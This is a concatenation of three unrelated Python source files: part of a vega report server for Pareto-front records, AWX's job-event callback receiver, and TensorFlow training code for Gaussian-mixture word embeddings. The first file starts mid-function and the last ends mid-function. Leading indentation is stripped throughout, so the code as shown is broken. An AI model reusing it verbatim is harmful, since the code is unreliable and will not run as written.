"""Get last records."""
if not self.all_records:
return None
return self.all_records[-1]
def get_pareto_front_records(self, step_name=None, nums=None, selected_key=None, choice=None):
"""Get Pareto Front Records."""
if not step_name:
step_name = General.step_name
records = self.all_records
if selected_key is not None:
new_records = []
selected_key.sort()
for record in records:
record._objective_keys.sort()
if record._objective_keys == selected_key:
new_records.append(record)
records = new_records
filter_steps = [step_name] if not isinstance(step_name, list) else step_name
records = list(filter(lambda x: x.step_name in filter_steps and x.performance is not None, records))
if records:
not_finished = [x.worker_id for x in records if not x.rewards_compeleted]
records = [x for x in records if x.rewards_compeleted]
if not_finished:
logging.info(f"waiting for the workers {str(not_finished)} to finish")
if not records:
return []
pareto = self.pareto_front(step_name, nums, records=records)
if not pareto:
return []
if choice is not None:
return [random.choice(pareto)]
else:
return pareto
# def _select_one_record(self, outs, choice='normal'):
# """Select one record."""
# if outs.size == 1:
# return outs.astype(int).tolist()
# if choice == 'normal':
# data = outs[:, 1:].reshape(-1, 1).tolist()
# prob = [round(np.log(i + 1e-2), 2) for i in range(1, len(data[0]) + 1)]
# prob_temp = prob
# for idx, out in enumerate(data):
# sorted_ind = np.argsort(out)
# for idx, ind in enumerate(sorted_ind):
# prob[ind] += prob_temp[idx]
# normalization = [float(i) / float(sum(prob)) for i in prob]
# return [np.random.choice(len(data[0]), p=normalization)]
@classmethod
def restore(cls):
"""Transfer cvs_file to records."""
step_path = TaskOps().step_path
_file = os.path.join(step_path, ".reports")
if os.path.exists(_file):
with open(_file, "rb") as f:
data = pickle.load(f)
cls._hist_records = data[0]
cls.__instances__ = data[1]
def backup_output_path(self):
"""Back up output to local path."""
backup_path = TaskOps().backup_base_path
if backup_path is None:
return
FileOps.copy_folder(TaskOps().local_output_path, backup_path)
def output_pareto_front(self, step_name):
"""Save one records."""
logging.debug("All records in report, records={}".format(self.all_records))
records = deepcopy(self.get_pareto_front_records(step_name))
logging.debug("Filter step records, records={}".format(records))
if not records:
logging.warning("Failed to dump pareto front records, report is emplty.")
return
self._output_records(step_name, records)
def output_step_all_records(self, step_name):
"""Output step all records."""
records = self.all_records
logging.debug("All records in report, records={}".format(self.all_records))
records = list(filter(lambda x: x.step_name == step_name, records))
logging.debug("Filter step records, records={}".format(records))
if not records:
logging.warning("Failed to dump records, report is emplty.")
return
self._output_records(step_name, records)
def _output_records(self, step_name, records):
"""Dump records."""
columns = ["worker_id", "performance", "desc"]
outputs = []
for record in records:
record = record.serialize()
_record = {}
for key in columns:
_record[key] = record[key]
outputs.append(deepcopy(_record))
data = pd.DataFrame(outputs)
step_path = FileOps.join_path(TaskOps().local_output_path, step_name)
FileOps.make_dir(step_path)
_file = FileOps.join_path(step_path, "output.csv")
try:
data.to_csv(_file, index=False)
except Exception:
logging.error("Failed to save output file, file={}".format(_file))
for record in outputs:
worker_id = record["worker_id"]
worker_path = TaskOps().get_local_worker_path(step_name, worker_id)
outputs_globs = []
outputs_globs += glob.glob(FileOps.join_path(worker_path, "desc_*.json"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "hps_*.json"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "model_*"))
outputs_globs += glob.glob(FileOps.join_path(worker_path, "performance_*.json"))
for _file in outputs_globs:
if os.path.isfile(_file):
FileOps.copy_file(_file, step_path)
elif os.path.isdir(_file):
FileOps.copy_folder(_file, FileOps.join_path(step_path, os.path.basename(_file)))
def set_step_names(self, step_names):
"""Add step information."""
global _records_lock, _modified
with _records_lock:
_modified = True
self.persistence.set_step_names(step_names)
def update_step_info(self, **kwargs):
"""Update step information."""
global _records_lock, _modified
with _records_lock:
_modified = True
self.persistence.update_step_info(**kwargs)
def __repr__(self):
"""Override repr function."""
return str(self.all_records)
@classmethod
def load_records_from_model_folder(cls, model_folder):
"""Transfer json_file to records."""
if not model_folder or not os.path.exists(model_folder):
logging.error("Failed to load records from model folder, folder={}".format(model_folder))
return []
records = []
pattern = FileOps.join_path(model_folder, "desc_*.json")
files = glob.glob(pattern)
for _file in files:
try:
with open(_file) as f:
worker_id = _file.split(".")[-2].split("_")[-1]
weights_file = os.path.join(os.path.dirname(_file), "model_{}".format(worker_id))
if vega.is_torch_backend():
weights_file = '{}.pth'.format(weights_file)
elif vega.is_ms_backend():
weights_file = '{}.ckpt'.format(weights_file)
if not os.path.exists(weights_file):
weights_file = None
sample = dict(worker_id=worker_id, desc=json.load(f), weights_file=weights_file)
record = ReportRecord().load_dict(sample)
records.append(record)
except Exception as ex:
logging.info('Can not read records from json because {}'.format(ex))
return records
def _start_save_report_thread(self):
_thread = Thread(target=_dump_report, args=(self, self.persistence,))
_thread.daemon = True
_thread.start()
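# Editor's sketch (assumption): get_pareto_index is imported from
# vega.common.pareto_front and is treated above as returning a boolean mask
# over the rewards matrix. A minimal reference version for a maximization
# problem could look like the following; this is an illustration only, not
# vega's actual implementation.
def _pareto_mask_sketch(rewards):
    """Return a boolean mask marking the non-dominated rows of `rewards`."""
    rewards = np.asarray(rewards)
    n = rewards.shape[0]
    mask = np.ones(n, dtype=bool)
    for i in range(n):
        for j in range(n):
            # row j dominates row i if it is >= everywhere and > somewhere
            if i != j and np.all(rewards[j] >= rewards[i]) and np.any(rewards[j] > rewards[i]):
                mask[i] = False
                break
    return mask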
def update_record(step_name=None, worker_id=None, **kwargs):
"""Update record."""
if step_name is None or worker_id is None:
return {"result": "failed", "message": "request message missing step_name or worker id."}
if kwargs:
kwargs["step_name"] = step_name
kwargs["worker_id"] = worker_id
uid = "{}_{}".format(step_name, worker_id)
global _records_lock, _modified
with _records_lock:
_modified = True
records = ReportServer()._hist_records
if uid in records:
records[uid].load_dict(kwargs)
logging.debug("update record: {}".format(records[uid].to_dict()))
else:
records[uid] = ReportRecord().load_dict(kwargs)
logging.debug("new record: {}".format(records[uid].to_dict()))
return {"result": "success", "data": records[uid].to_dict()}
def get_record(step_name=None, worker_id=None, **kwargs):
"""Get record."""
if step_name is None or worker_id is None:
return {"result": "failed", "message": "require message missing step_name or worker id."}
uid = "{}_{}".format(step_name, worker_id)
records = ReportServer()._hist_records
if uid in records:
data = records[uid].to_dict()
else:
data = ReportRecord().to_dict()
return {"result": "success", "data": data}
def _dump_report(report_server, persistence):
while True:
time.sleep(1)
global _records_lock, _modified
with _records_lock:
if not _modified:
continue
all_records = deepcopy(report_server.all_records)
_modified = False
try:
persistence.save_report(all_records)
# TODO
# persistence.pickle_report(report_server._hist_records, report_server.__instances__)
report_server.backup_output_path()
except Exception as e:
logging.warning(f"Failed to dump reports, message={str(e)}")
|
run_callback_receiver.py
|
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
import logging
import os
import signal
import time
from uuid import UUID
from multiprocessing import Process
from multiprocessing import Queue as MPQueue
from Queue import Empty as QueueEmpty
from Queue import Full as QueueFull
from kombu import Connection, Exchange, Queue
from kombu.mixins import ConsumerMixin
# Django
from django.conf import settings
from django.core.management.base import BaseCommand
from django.db import connection as django_connection
from django.db import DatabaseError, OperationalError
from django.db.utils import InterfaceError, InternalError
from django.core.cache import cache as django_cache
# AWX
from awx.main.models import * # noqa
from awx.main.consumers import emit_channel_notification
logger = logging.getLogger('awx.main.commands.run_callback_receiver')
class WorkerSignalHandler:
def __init__(self):
self.kill_now = False
signal.signal(signal.SIGINT, self.exit_gracefully)
signal.signal(signal.SIGTERM, self.exit_gracefully)
def exit_gracefully(self, *args, **kwargs):
self.kill_now = True
class CallbackBrokerWorker(ConsumerMixin):
MAX_RETRIES = 2
def __init__(self, connection, use_workers=True):
self.connection = connection
self.worker_queues = []
self.total_messages = 0
self.init_workers(use_workers)
def init_workers(self, use_workers=True):
def shutdown_handler(active_workers):
def _handler(signum, frame):
try:
for active_worker in active_workers:
active_worker.terminate()
signal.signal(signum, signal.SIG_DFL)
os.kill(os.getpid(), signum) # Rethrow signal, this time without catching it
except Exception:
logger.exception('Error in shutdown_handler')
return _handler
if use_workers:
for idx in range(settings.JOB_EVENT_WORKERS):
queue_actual = MPQueue(settings.JOB_EVENT_MAX_QUEUE_SIZE)
w = Process(target=self.callback_worker, args=(queue_actual, idx,))
if settings.DEBUG:
logger.info('Starting worker %s' % str(idx))
self.worker_queues.append([0, queue_actual, w])
# It's important to close these _right before_ we fork; we
# don't want the forked processes to inherit the open sockets
# for the DB and memcached connections (that way lies race
# conditions)
django_connection.close()
django_cache.close()
for _, _, w in self.worker_queues:
w.start()
elif settings.DEBUG:
logger.warn('Started callback receiver (no workers)')
signal.signal(signal.SIGINT, shutdown_handler([p[2] for p in self.worker_queues]))
signal.signal(signal.SIGTERM, shutdown_handler([p[2] for p in self.worker_queues]))
def get_consumers(self, Consumer, channel):
return [Consumer(queues=[Queue(settings.CALLBACK_QUEUE,
Exchange(settings.CALLBACK_QUEUE, type='direct'),
routing_key=settings.CALLBACK_QUEUE)],
accept=['json'],
callbacks=[self.process_task])]
def process_task(self, body, message):
if "uuid" in body and body['uuid']:
try:
queue = UUID(body['uuid']).int % settings.JOB_EVENT_WORKERS
except Exception:
queue = self.total_messages % settings.JOB_EVENT_WORKERS
else:
queue = self.total_messages % settings.JOB_EVENT_WORKERS
self.write_queue_worker(queue, body)
self.total_messages += 1
message.ack()
def write_queue_worker(self, preferred_queue, body):
queue_order = sorted(range(settings.JOB_EVENT_WORKERS), cmp=lambda x, y: -1 if x==preferred_queue else 0)
write_attempt_order = []
for queue_actual in queue_order:
try:
worker_actual = self.worker_queues[queue_actual]
worker_actual[1].put(body, block=True, timeout=5)
worker_actual[0] += 1
return queue_actual
except QueueFull:
pass
except Exception:
import traceback
tb = traceback.format_exc()
logger.warn("Could not write to queue %s" % preferred_queue)
logger.warn("Detail: {}".format(tb))
write_attempt_order.append(preferred_queue)
logger.warn("Could not write payload to any queue, attempted order: {}".format(write_attempt_order))
return None
def callback_worker(self, queue_actual, idx):
signal_handler = WorkerSignalHandler()
while not signal_handler.kill_now:
try:
body = queue_actual.get(block=True, timeout=1)
except QueueEmpty:
continue
except Exception as e:
logger.error("Exception on worker thread, restarting: " + str(e))
continue
try:
event_map = {
'job_id': JobEvent,
'ad_hoc_command_id': AdHocCommandEvent,
'project_update_id': ProjectUpdateEvent,
'inventory_update_id': InventoryUpdateEvent,
'system_job_id': SystemJobEvent,
}
if not any([key in body for key in event_map]):
raise Exception('Payload does not have a job identifier')
if settings.DEBUG:
from pygments import highlight
from pygments.lexers import PythonLexer
from pygments.formatters import Terminal256Formatter
from pprint import pformat
logger.info('Body: {}'.format(
highlight(pformat(body, width=160), PythonLexer(), Terminal256Formatter(style='friendly'))
)[:1024 * 4])
def _save_event_data():
for key, cls in event_map.items():
if key in body:
cls.create_from_data(**body)
job_identifier = 'unknown job'
for key in event_map.keys():
if key in body:
job_identifier = body[key]
break
if body.get('event') == 'EOF':
try:
final_counter = body.get('final_counter', 0)
logger.info('Event processing is finished for Job {}, sending notifications'.format(job_identifier))
# EOF events are sent when stdout for the running task is
                        # closed. Don't actually persist them to the database; we
# just use them to report `summary` websocket events as an
# approximation for when a job is "done"
emit_channel_notification(
'jobs-summary',
dict(group_name='jobs', unified_job_id=job_identifier, final_counter=final_counter)
)
# Additionally, when we've processed all events, we should
# have all the data we need to send out success/failure
# notification templates
uj = UnifiedJob.objects.get(pk=job_identifier)
if hasattr(uj, 'send_notification_templates'):
retries = 0
while retries < 5:
if uj.finished:
uj.send_notification_templates('succeeded' if uj.status == 'successful' else 'failed')
break
else:
# wait a few seconds to avoid a race where the
# events are persisted _before_ the UJ.status
# changes from running -> successful
retries += 1
time.sleep(1)
uj = UnifiedJob.objects.get(pk=job_identifier)
except Exception:
logger.exception('Worker failed to emit notifications: Job {}'.format(job_identifier))
continue
retries = 0
while retries <= self.MAX_RETRIES:
try:
_save_event_data()
break
except (OperationalError, InterfaceError, InternalError) as e:
if retries >= self.MAX_RETRIES:
logger.exception('Worker could not re-establish database connectivity, shutting down gracefully: Job {}'.format(job_identifier))
os.kill(os.getppid(), signal.SIGINT)
return
delay = 60 * retries
logger.exception('Database Error Saving Job Event, retry #{i} in {delay} seconds:'.format(
i=retries + 1,
delay=delay
))
django_connection.close()
time.sleep(delay)
retries += 1
except DatabaseError as e:
logger.exception('Database Error Saving Job Event for Job {}'.format(job_identifier))
break
except Exception as exc:
import traceback
tb = traceback.format_exc()
logger.error('Callback Task Processor Raised Exception: %r', exc)
logger.error('Detail: {}'.format(tb))
class Command(BaseCommand):
'''
Save Job Callback receiver (see awx.plugins.callbacks.job_event_callback)
Runs as a management command and receives job save events. It then hands
    them off to worker processes (see Worker), which write them to the database.
'''
help = 'Launch the job callback receiver'
def handle(self, *arg, **options):
with Connection(settings.BROKER_URL) as conn:
try:
worker = CallbackBrokerWorker(conn)
worker.run()
except KeyboardInterrupt:
print('Terminating Callback Receiver')
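# Editor's demo (hypothetical helper, not part of AWX): the bucketing rule
# used in CallbackBrokerWorker.process_task above, which keeps every event of
# a given job on the same worker queue.
def _demo_select_worker(event_uuid, num_workers=4):
    """Map a job event UUID string to a stable worker index."""
    return UUID(event_uuid).int % num_workers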
|
regularized_embeddings.py
|
"""
Ben Athiwaratkun
Training code for Gaussian Mixture word embeddings model
Adapted from tensorflow's word2vec.py
(https://github.com/tensorflow/models/blob/master/tutorials/embedding/word2vec.py)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import threading
import time
import math
# Restrict to CPU only
os.environ["CUDA_VISIBLE_DEVICES"]=""
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
import tensorflow as tf
import pickle
#from tensorflow.models.embedding import gen_word2vec as word2vec
#word2vec = tf.load_op_library(os.path.join(os.path.di))
word2vec = tf.load_op_library(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'word2vec_ops.so'))
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model and "
"training summaries. (required)")
flags.DEFINE_string("train_data", None, "Training text file. (required)")
flags.DEFINE_integer("embedding_size", 50, "The embedding dimension size.")
flags.DEFINE_integer(
"epochs_to_train", 5,
"Number of epochs to train. Each epoch processes the training data once "
"completely.")
flags.DEFINE_float("learning_rate", 0.2, "Initial learning rate.")
flags.DEFINE_integer("batch_size", 256,
"Number of training examples processed per step "
"(size of a minibatch).")
flags.DEFINE_integer("concurrent_steps", 12,
"The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
"The number of words to predict to the left and right "
"of the target word.")
flags.DEFINE_float("regularization_coeff", 0.005,
"Regularization coefficient.")
flags.DEFINE_integer("min_count", 5,
"The minimum number of word occurrences for it to be "
"included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
"Subsample threshold for word occurrence. Words that appear "
"with higher frequency will be randomly down-sampled. Set "
"to 0 to disable.")
flags.DEFINE_integer("statistics_interval", 5,
"Print statistics every n seconds.")
flags.DEFINE_integer("summary_interval", 5,
"Save training summary to file every n seconds (rounded "
"up to statistics interval).")
flags.DEFINE_integer("checkpoint_interval", 600,
"Checkpoint the model (i.e. save the parameters) every n "
"seconds (rounded up to statistics interval).")
flags.DEFINE_integer("num_mixtures", 2,
"Number of mixture component for Mixture of Gaussians")
flags.DEFINE_boolean("spherical", False,
"Whether the model should be spherical of diagonal"
"The default is spherical")
flags.DEFINE_float("var_scale", 0.05, "Variance scale")
flags.DEFINE_boolean("ckpt_all", False, "Keep all checkpoints"
"(Warning: This requires a large amount of disk space).")
flags.DEFINE_float("norm_cap", 3.0,
"The upper bound of norm of mean vector")
flags.DEFINE_float("lower_sig", 0.02,
"The lower bound for sigma element-wise")
flags.DEFINE_float("upper_sig", 5.0,
"The upper bound for sigma element-wise")
flags.DEFINE_float("mu_scale", 1.0,
"The average norm will be around mu_scale")
flags.DEFINE_float("objective_threshold", 1.0,
"The threshold for the objective")
flags.DEFINE_boolean("adagrad", False,
"Use Adagrad optimizer instead")
flags.DEFINE_float("loss_epsilon", 1e-4,
"epsilon parameter for loss function")
flags.DEFINE_boolean("constant_lr", False,
"Use constant learning rate")
flags.DEFINE_boolean("wout", False,
"Whether we would use a separate wout")
flags.DEFINE_boolean("max_pe", False,
"Using maximum of partial energy instead of the sum")
flags.DEFINE_integer("max_to_keep", 5,
"The maximum number of checkpoint files to keep")
flags.DEFINE_boolean("normclip", False,
"Whether to perform norm clipping (very slow)")
flags.DEFINE_string("rep", "gm", 'The type of representation. Either gm or vec')
flags.DEFINE_integer("fixvar", 0, "whether to fix the variance or not")
FLAGS = flags.FLAGS
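# Editor's sketch: the closed-form quantity computed by partial_logenergy()
# inside calculate_loss() below, i.e. the log inner product of two diagonal
# Gaussians, log N(0; mu1 - mu2, Sigma1 + Sigma2), up to the constant
# -D/2 * log(2*pi). Written in numpy for clarity; epsilon mirrors
# FLAGS.loss_epsilon.
def _log_energy_sketch(mu1, sig1, mu2, sig2, epsilon=1e-4):
    a = sig1 + sig2                                    # summed variances
    logdet = np.sum(np.log(epsilon + a))               # log-determinant term
    exp_term = np.sum((mu1 - mu2) ** 2 / (epsilon + a))  # Mahalanobis term
    return -0.5 * logdet - 0.5 * exp_term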
class Options(object):
"""Options used by our Word2MultiGauss model."""
def __init__(self):
# Model options.
# Embedding dimension.
self.emb_dim = FLAGS.embedding_size
# Training options.
# The training text file.
self.train_data = FLAGS.train_data
# The initial learning rate.
self.learning_rate = FLAGS.learning_rate
# Number of epochs to train. After these many epochs, the learning
# rate decays linearly to zero and the training stops.
self.epochs_to_train = FLAGS.epochs_to_train
        # Concurrent training steps.
self.concurrent_steps = FLAGS.concurrent_steps
# Number of examples for one training step.
self.batch_size = FLAGS.batch_size
# The number of words to predict to the left and right of the target word.
self.window_size = FLAGS.window_size
# George Ho: Regularization coefficient.
self.regularization_coeff = FLAGS.regularization_coeff
# The minimum number of word occurrences for it to be included in the
# vocabulary.
self.min_count = FLAGS.min_count
# Subsampling threshold for word occurrence.
self.subsample = FLAGS.subsample
# How often to print statistics.
self.statistics_interval = FLAGS.statistics_interval
# How often to write to the summary file (rounds up to the nearest
# statistics_interval).
self.summary_interval = FLAGS.summary_interval
# How often to write checkpoints (rounds up to the nearest statistics
# interval).
self.checkpoint_interval = FLAGS.checkpoint_interval
# Where to write out summaries.
self.save_path = FLAGS.save_path
#################################
self.num_mixtures = FLAGS.num_mixtures # incorporated. needs testing
# upper bound of norm of mu
self.norm_cap = FLAGS.norm_cap
# element-wise lower bound for sigma
self.lower_sig = FLAGS.lower_sig
# element-wise upper bound for sigma
self.upper_sig = FLAGS.upper_sig
# whether to use spherical or diagonal covariance
self.spherical = FLAGS.spherical ## default to False please
self.var_scale = FLAGS.var_scale
self.ckpt_all = FLAGS.ckpt_all
self.mu_scale = FLAGS.mu_scale
self.objective_threshold = FLAGS.objective_threshold
self.adagrad = FLAGS.adagrad
self.loss_epsilon = FLAGS.loss_epsilon
self.constant_lr = FLAGS.constant_lr
self.wout = FLAGS.wout
self.max_pe = FLAGS.max_pe
self.max_to_keep = FLAGS.max_to_keep
self.normclip = FLAGS.normclip
self.rep = FLAGS.rep
self.fixvar = FLAGS.fixvar
class Word2GMtrainer(object):
def __init__(self, options, session):
self._options = options
# Ben A: print important opts
opts = options
print('--------------------------------------------------------')
print('Rep {}'.format(opts.rep))
print('Train data {}'.format(opts.train_data))
print('Norm cap {} lower sig {} upper sig {}'.format(opts.norm_cap,
opts.lower_sig, opts.upper_sig))
print('mu_scale {} var_scale {}'.format(opts.mu_scale, opts.var_scale))
print('Num Mixtures {} Spherical Mode = {}'.format(opts.num_mixtures, opts.spherical))
print('Emb dim {}'.format(opts.emb_dim))
print('Epochs to train {}'.format(opts.epochs_to_train))
print('Learning rate {} // constant {}'.format(opts.learning_rate, opts.constant_lr))
print('Using a separate Wout = {}'.format(opts.wout))
print('Subsampling rate = {}'.format(opts.subsample))
print('Using Max Partial Energy Loss = {}'.format(opts.max_pe))
print('Loss Epsilon = {}'.format(opts.loss_epsilon))
print('Saving results to = {}'.format(options.save_path))
print('--------------------------------------------------------')
self._session = session
self._word2id = {}
self._id2word = []
self.build_graph() #
self.save_vocab()
def optimize(self, loss):
"""Build the graph to optimize the loss function."""
# Optimizer nodes.
# Linear learning rate decay.
opts = self._options
if opts.constant_lr:
self._lr = tf.constant(opts.learning_rate)
else:
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001, 1.0 - tf.cast(self._words, tf.float32) / words_to_train)
self._lr = lr
optimizer = tf.train.GradientDescentOptimizer(self._lr)
train = optimizer.minimize(loss,
global_step=self.global_step,
gate_gradients=optimizer.GATE_NONE)
self._train = train
def optimize_adam(self, loss):
# deprecated
opts = self._options
# use automatic decay of learning rate in Adam
self._lr = tf.constant(opts.learning_rate)
self.adam_epsilon = opts.adam_epsilon
optimizer = tf.train.AdamOptimizer(self._lr, epsilon=self.adam_epsilon)
train = optimizer.minimize(loss, global_step=self.global_step,
gate_gradients=optimizer.GATE_NONE)
self._train = train
def optimize_adagrad(self, loss):
print('Using Adagrad optimizer')
opts = self._options
if opts.constant_lr:
self._lr = tf.constant(opts.learning_rate)
else:
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001, 1.0 - tf.cast(self._words, tf.float32) / words_to_train)
self._lr = lr
optimizer = tf.train.AdagradOptimizer(self._lr)
train = optimizer.minimize(loss,
global_step=self.global_step,
gate_gradients=optimizer.GATE_NONE)
self._train = train
def calculate_loss(self, word_idxs, pos_idxs):
# This is two methods in one (forward and nce_loss)
self.global_step = tf.Variable(0, name="global_step")
opts = self._options
#####################################################
# the model parameters
vocabulary_size = opts.vocab_size
embedding_size = opts.emb_dim
batch_size = opts.batch_size
regularization_coeff = opts.regularization_coeff
norm_cap = opts.norm_cap
lower_sig = opts.lower_sig
upper_sig = opts.upper_sig
self.norm_cap = norm_cap
self.lower_logsig = math.log(lower_sig)
self.upper_logsig = math.log(upper_sig)
num_mixtures = opts.num_mixtures
spherical = opts.spherical
objective_threshold = opts.objective_threshold
# the model parameters
mu_scale = opts.mu_scale*math.sqrt(3.0/(1.0*embedding_size))
mus = tf.get_variable('mu', initializer=tf.random_uniform([vocabulary_size, num_mixtures, embedding_size], -mu_scale, mu_scale))
if opts.wout:
            mus_out = tf.get_variable('mu_out', initializer=tf.random_uniform([vocabulary_size, num_mixtures, embedding_size], -mu_scale, mu_scale))
        # This initialization makes the variance around 1
var_scale = opts.var_scale
logvar_scale = math.log(var_scale)
print('mu_scale = {} var_scale = {}'.format(mu_scale, var_scale))
var_trainable = 1-self._options.fixvar
print('var trainable =', var_trainable)
if spherical:
logsigs = tf.get_variable('sigma',
initializer=tf.random_uniform([vocabulary_size, num_mixtures,1],
logvar_scale, logvar_scale), trainable=var_trainable)
if opts.wout:
logsigs_out = tf.get_variable('sigma_out',
initializer=tf.random_uniform([vocabulary_size, num_mixtures,1],
logvar_scale, logvar_scale), trainable=var_trainable)
else:
logsigs = tf.get_variable('sigma',
initializer=tf.random_uniform([vocabulary_size, num_mixtures, embedding_size],
logvar_scale, logvar_scale), trainable=var_trainable)
if opts.wout:
logsigs_out = tf.get_variable('sigma_out',
initializer=tf.random_uniform([vocabulary_size, num_mixtures, embedding_size],
logvar_scale, logvar_scale), trainable=var_trainable)
mixture = tf.get_variable('mixture', initializer=tf.random_uniform([vocabulary_size, num_mixtures], 0, 0))
if opts.wout:
            mixture_out = tf.get_variable('mixture_out', initializer=tf.random_uniform([vocabulary_size, num_mixtures], 0, 0))
if not opts.wout:
mus_out = mus
logsigs_out = logsigs
mixture_out = mixture
zeros_vec = tf.zeros([batch_size], name='zeros')
self._mus = mus
self._logsigs = logsigs
labels_matrix = tf.reshape(
tf.cast(pos_idxs,
dtype=tf.int64),
[opts.batch_size, 1])
# Negative sampling.
neg_idxs, _, _ = (tf.nn.fixed_unigram_candidate_sampler(
true_classes=labels_matrix,
num_true=1,
num_sampled=opts.batch_size, # Use 1 negative sample per positive sample
unique=True,
range_max=opts.vocab_size,
distortion=0.75,
unigrams=opts.vocab_counts.tolist(), name='neg_idxs'))
self._neg_idxs = neg_idxs
def log_energy(mu1, sig1, mix1, mu2, sig2, mix2, only_bw_modes=False):
### need to pass mix that's compatible!
### George Ho: `only_bw_modes` precludes computing log energies
### between the same mode. For the regularization. Make sure to pass in
### mixes of the same length!
def partial_logenergy(cl1, cl2):
m1 = mu1[:,cl1,:]
m2 = mu2[:,cl2,:]
s1 = sig1[:,cl1,:]
s2 = sig2[:,cl2,:]
with tf.name_scope('partial_logenergy') as scope:
                    _a = tf.add(s1, s2)  # should we do a max-add here for numerical stability?
epsilon = opts.loss_epsilon
if spherical:
logdet = embedding_size*tf.log(epsilon + tf.squeeze(_a))
else:
logdet = tf.reduce_sum(tf.log(epsilon + _a), reduction_indices=1, name='logdet')
ss_inv = 1./(epsilon + _a)
#diff = tf.sub(m1, m2)
diff = tf.subtract(m1, m2)
exp_term = tf.reduce_sum(diff*ss_inv*diff, reduction_indices=1, name='expterm')
pe = -0.5*logdet - 0.5*exp_term
return pe
with tf.name_scope('logenergy') as scope:
log_e_list = []
mix_list = []
for cl1 in xrange(num_mixtures):
for cl2 in xrange(num_mixtures):
if (not only_bw_modes) or cl1 != cl2:
log_e_list.append(partial_logenergy(cl1, cl2))
mix_list.append(mix1[:,cl1]*mix2[:,cl2])
log_e_pack = tf.stack(log_e_list)
log_e_max = tf.reduce_max(log_e_list, reduction_indices=0)
if opts.max_pe:
# Ben A: got this warning for max_pe
# UserWarning:
                    # Converting sparse IndexedSlices to a dense Tensor of unknown shape. This may consume a large amount of memory.
log_e_argmax = tf.argmax(log_e_list, dimension=0)
log_e = log_e_max*tf.gather(mix_list, log_e_argmax)
else:
mix_pack = tf.stack(mix_list)
log_e = tf.log(tf.reduce_sum(mix_pack*tf.exp(log_e_pack-log_e_max), reduction_indices=0))
log_e += log_e_max
return log_e
def Lfunc(word_idxs, pos_idxs, neg_idxs):
with tf.name_scope('LossCal') as scope:
mu_embed = tf.nn.embedding_lookup(mus, word_idxs, name='MuWord')
mu_embed_pos = tf.nn.embedding_lookup(mus_out, pos_idxs, name='MuPos')
mu_embed_neg = tf.nn.embedding_lookup(mus_out, neg_idxs, name='MuNeg')
sig_embed = tf.exp(tf.nn.embedding_lookup(logsigs, word_idxs), name='SigWord')
sig_embed_pos = tf.exp(tf.nn.embedding_lookup(logsigs_out, pos_idxs), name='SigPos')
sig_embed_neg = tf.exp(tf.nn.embedding_lookup(logsigs_out, neg_idxs), name='SigNeg')
mix_word = tf.nn.softmax(tf.nn.embedding_lookup(mixture, word_idxs), name='MixWord')
mix_pos = tf.nn.softmax(tf.nn.embedding_lookup(mixture_out, pos_idxs), name='MixPos')
mix_neg = tf.nn.softmax(tf.nn.embedding_lookup(mixture_out, neg_idxs), name='MixNeg')
epos = log_energy(mu_embed, sig_embed, mix_word, mu_embed_pos, sig_embed_pos, mix_pos)
eneg = log_energy(mu_embed, sig_embed, mix_word, mu_embed_neg, sig_embed_neg, mix_neg)
eself = log_energy(mu_embed, sig_embed, mix_word, mu_embed, sig_embed, mix_word, only_bw_modes=True)
loss_indiv = tf.maximum(zeros_vec, objective_threshold - epos + eneg,
name='CalculateIndividualLoss')
reg_indiv = regularization_coeff * eself
loss = tf.reduce_mean(loss_indiv, name='AveLoss')
reg = tf.reduce_mean(reg_indiv, name='AveReg')
return loss + tf.exp(-reg), loss, reg
loss_reg, loss, reg = Lfunc(word_idxs, pos_idxs, neg_idxs)
tf.summary.scalar('loss', loss)
tf.summary.scalar('reg', reg)
return loss_reg
def clip_ops_graph(self, word_idxs, pos_idxs, neg_idxs):
def clip_val_ref(embedding, idxs):
with tf.name_scope('clip_val'):
to_update = tf.nn.embedding_lookup(embedding, idxs)
to_update = tf.maximum(self.lower_logsig, tf.minimum(self.upper_logsig, to_update))
return tf.scatter_update(embedding, idxs, to_update)
def clip_norm_ref(embedding, idxs):
with tf.name_scope('clip_norm_ref') as scope:
to_update = tf.nn.embedding_lookup(embedding, idxs)
to_update = tf.clip_by_norm(to_update, self.norm_cap, axes=2)
return tf.scatter_update(embedding, idxs, to_update)
clip1 = clip_norm_ref(self._mus, word_idxs)
clip2 = clip_norm_ref(self._mus, pos_idxs)
clip3 = clip_norm_ref(self._mus, neg_idxs)
clip4 = clip_val_ref(self._logsigs, word_idxs)
clip5 = clip_val_ref(self._logsigs, pos_idxs)
clip6 = clip_val_ref(self._logsigs, neg_idxs)
return [clip1, clip2, clip3, clip4, clip5, clip6]
def build_graph(self):
"""Build the graph for the full model."""
opts = self._options
# The training data. A text file.
(words, counts, words_per_epoch, self._epoch, self._words, examples,
labels) = word2vec.skipgram_word2vec(filename=opts.train_data,
batch_size=opts.batch_size,
window_size=opts.window_size,
min_count=opts.min_count,
subsample=opts.subsample)
(opts.vocab_words, opts.vocab_counts,
opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
opts.vocab_size = len(opts.vocab_words)
print("Data file: ", opts.train_data)
print("Vocab size: ", opts.vocab_size - 1, " + UNK")
print("Words per epoch: ", opts.words_per_epoch)
self._examples = examples
self._labels = labels
self._id2word = opts.vocab_words
for i, w in enumerate(self._id2word):
self._word2id[w] = i
pickle.dump(self._word2id, open("word2id.pkl", 'wb'))
loss = self.calculate_loss(examples, labels)
self._loss = loss
if opts.normclip:
self._clip_ops = self.clip_ops_graph(self._examples, self._labels, self._neg_idxs)
if opts.adagrad:
print("Using Adagrad as an optimizer!")
self.optimize_adagrad(loss)
else:
# Using Standard SGD
self.optimize(loss)
# Properly initialize all variables.
self.check_op = tf.add_check_numerics_ops()
tf.initialize_all_variables().run()
try:
print('Try using saver version v2')
self.saver = tf.train.Saver(write_version=tf.train.SaverDef.V2, max_to_keep = opts.max_to_keep)
        except Exception:
print('Default to saver version v1')
